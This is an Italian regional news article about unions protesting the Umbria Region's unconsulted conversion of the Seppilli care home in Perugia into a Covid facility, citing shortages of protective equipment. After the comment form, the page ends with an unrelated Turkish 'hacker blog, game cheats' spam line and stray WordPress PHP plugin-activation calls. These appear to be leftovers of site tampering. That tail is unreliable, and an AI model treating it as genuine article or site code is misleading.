Emergenza Coronavirus, per l’Rsa Covid all’ex Grocco di Perugia scatta il presidio dei sindacati contro la Regione – Corriere dell’Umbria



Rsa Covid all’ex Grocco, annunciata la protesta dei sindacati. Sull’onda della mancata convocazione da parte dell’assessore regionale alla salute,Luca Coletto, Fp Cgil, Fp Cisl e Uil Fpl dell’Umbria accendono la miccia: “Apprendiamo che è stata presa la decisione di convertire in struttura Covid la Rsa Casa dell’Amicizia A. Seppilli di Perugia. Una decisione presa ancora una volta senza alcun confronto o coinvolgimento del personale e delle organizzazioni sindacali rappresentative – sottolineano i sindacati – che inevitabilmente genera grande apprensione nelle lavoratrici e nei lavoratori di quella struttura, vista la grave carenza di dispositivi di protezione e l’inadeguatezza della struttura stessa. È l’ennesima dimostrazione di quanto ci sia bisogno di scelte oculate, di programmazione e del coinvolgimento di chi sta davvero in prima linea e conosce difficoltà e bisogni del sistema”. Da qui l’ulteriore richiesta di convocazione rivolta alla Regione. Fp Cgil, Fp Cisl e Uil Fpl organizzeranno un presidio davanti alla Rsa Seppilli, in via della Pallotta 42 a Perugia, stamattina (mercoledì 28 ottobre) alle ore 9.00. 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );